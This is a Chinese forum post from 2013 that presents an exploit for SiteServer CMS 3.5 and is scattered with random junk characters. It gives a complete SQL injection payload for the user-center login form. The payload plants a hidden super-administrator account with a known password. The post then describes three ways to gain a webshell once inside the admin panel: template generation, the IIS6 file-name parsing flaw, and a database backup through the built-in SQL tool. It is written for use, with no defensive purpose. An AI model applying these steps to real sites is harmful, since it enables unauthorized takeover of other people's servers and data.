经测试秒杀最新的3.5版- A7 k- Z+ x8 i7 z7 h# Z" `5 X
stieserver官网:www.siteserver.cn0 [9 Q# m. F3 ^7 u, ^6 h/ l) O, R/ D& L
EXP:
, i' b2 I5 a/ j" P* B# z直接访问UserCenter/login.aspx d: w6 y' M; a& m% a7 L
用户名处输入:
) ?/ u$ l$ Q8 ~, M- }
+ Y$ p. \4 ~# F1 I7 ?& z4 X123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–3 X! R$ n% Q6 p& B; g1 {
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
, N$ `8 F% W1 V2 E之后再访问后台SiteServer/login.aspx用插入的用户登陆8 \3 C; G4 [: m+ X
后台拿webshell的三种方法:' f" D; c& q u" P/ c
一、5 S* a+ E) E4 ], E0 s8 h$ m6 H
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
, h# s. j% E0 R" e: N, N二、5 D9 G/ ?- f+ ~/ F( r7 D
成员权限-》添加用户-》用户名为:1.asp
8 j7 w% O, |& V: Q* _! ^1 whttp://127.0.0.1/usercenter/2 C, d' K2 B* P8 N+ e {8 I, z
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell) e' c# ~/ ?1 Z; A) o4 y8 p( m
(ps:后台添加用户时不会验证是否含有非法字符)
, z) l8 D' l) y( ] @; G9 Z三、
8 K/ v) J( s: ?2 j3 h* U" k系统工具-》实用工具-》机器参数查看
: f6 A2 j% v5 O可以看到数据库类型、名称,WEB路径9 T( M3 S0 t6 S/ P
系统工具-》数据库工具-》SQL语句查询6 l$ g$ R+ G8 {. {, m
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对